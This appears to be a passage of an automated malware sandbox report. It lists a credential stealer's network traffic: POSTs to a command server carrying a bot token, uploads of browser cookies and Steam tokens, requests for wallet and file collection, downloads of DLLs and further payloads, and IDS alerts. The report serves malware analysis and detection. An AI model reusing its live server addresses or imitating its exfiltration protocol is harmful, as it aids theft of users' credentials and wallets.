Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 42 2d 2d 0d 0a Data Ascii: ------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------IJEGDBGDBFIJKECBAKFBContent-Disposition: form-data; name="message"plugins------IJEGDBGDBFIJKECBAKFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="message"fplugins------CFHIIEHJKKECGCBFIIJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHDBKJEGHJJJKFIIJEHost: 185.215.113.206Content-Length: 7251Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFHost: 185.215.113.206Content-Length: 427Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 2d 2d 0d 0a Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IIDHJDGCGDAAKEBGDBKF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIDHIEGIIIECAKEBFBAHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 2d 2d 0d 0a Data Ascii: ------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DHIDHIEGIIIECAKEBFBAContent-Disposition: form-data; name="file"------DHIDHIEGIIIECAKEBFBA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAECBAEGDGDHIEHIJHost: 185.215.113.206Content-Length: 3087Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 47 49 4a 4a 44 47 43 42 4b 46 49 44 48 49 45 42 4b 2d 2d 0d 0a Data Ascii: ------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDGIJJDGCBKFIDHIEBKContent-Disposition: form-data; name="file"------EHDGIJJDGCBKFIDHIEBK--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDBHost: 185.215.113.206Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEGIDGDGHCAAAAKKFCGHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 47 49 44 47 44 47 48 43 41 41 41 41 4b 4b 46 43 47 2d 2d 0d 0a Data Ascii: ------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------JKEGIDGDGHCAAAAKKFCGContent-Disposition: form-data; name="message"wallets------JKEGIDGDGHCAAAAKKFCG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="message"files------CFHIIEHJKKECGCBFIIJD--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file"------DBGHDGHCGHCAAKFIIECF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="message"ybncbhylepme------KEGCFCAKFHCGCBFHCGHD--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 38 62 32 30 37 35 63 32 38 33 61 64 35 31 30 33 30 36 38 61 65 35 65 33 32 35 38 61 65 66 65 37 64 66 34 33 32 35 64 35 66 66 64 32 36 38 66 37 32 39 39 37 38 63 34 62 61 62 36 66 35 35 64 39 62 34 37 34 30 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"b8b2075c283ad5103068ae5e3258aefe7df4325d5ffd268f729978c4bab6f55d9b474012------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EGDGIIJJECFIDHJJKKFC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 42 32 37 37 37 42 35 35 41 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBB2777B55A82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /files/1724962075/eDPQZkT.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 39 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1009006001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 13.107.246.63 13.107.246.63
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49744 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49830 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:61157 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:61175 -> 104.21.88.250:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:61182 -> 104.21.88.250:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:61180 -> 31.41.244.11:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:61188 -> 104.21.88.250:443
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49828 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB5CC60 PR_Recv, 0_2_6CB5CC60
